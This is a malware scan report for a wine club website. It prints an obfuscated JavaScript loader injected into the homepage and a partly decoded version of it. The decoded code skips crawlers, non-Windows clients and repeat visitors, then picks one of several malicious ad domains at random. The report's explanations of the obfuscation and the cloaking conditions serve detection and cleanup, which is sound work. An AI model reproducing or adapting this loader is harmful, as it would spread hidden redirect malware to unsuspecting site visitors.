Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lafayettewineclub.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lafayettewineclub.com/ | 200 OK Content-Length: 10586 Content-Type: text/html | malicious |
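Malicious code found. Script contains blacklisted domain: toolbarcom.org
Obfuscated script: this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]...
Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
Note: The obfuscated loader hides the names unescape, fromCharCode, length and substr behind unescape("%..") fragments and rebuilds its payload from a string of two-character hex pairs, so a plain string search of the page source will not show the blacklisted domains. The visible part of the decoded script runs only when the "holycookie" cookie is absent, the user agent does not match the search-engine pattern, and navigator.appVersion contains "win". It then picks one of the five listed domains and one of the listed three-letter prefixes at random and sets "holycookie" with an expiry 9072E4 ms (about 25 hours) ahead. Because crawlers, non-Windows clients and repeat visitors are skipped, a single clean page load does not show that the page has been cleaned; check the served HTML for the loader itself. The rest of the decoded script is truncated in this report, so what is done with the chosen host is not shown here.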
http://lafayettewineclub.com/al/javascript/menudrop.js | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
http://lafayettewineclub.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lafayettewineclub.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 21:53:37 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-eihaoojk=B154138902133A8BA929DAFFE1B750F5; path=/
Set-Cookie: PHPSESSID=5dfn18c65m3c5aup4va9j0l670; path=/
GET / HTTP/1.1
Host: lafayettewineclub.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 21:53:37 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-eihaoojk=B154138902133A8BA929DAFFE1B750F5; path=/
Set-Cookie: PHPSESSID=5dfn18c65m3c5aup4va9j0l670; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: lafayettewineclub.com
Referer: http://www.google.com/search?q=lafayettewineclub.com
Result:
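The result is similar to the first query; no suspicious redirects were found. Note that the malicious code reported under "Scanned pages/files" is client-side script in the page body, which a comparison of HTTP responses such as this one would not be expected to reveal.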
GET / HTTP/1.1
Host: lafayettewineclub.com
Referer: http://www.google.com/search?q=lafayettewineclub.com
Result:
The result is similar to the first query; no suspicious redirects were found.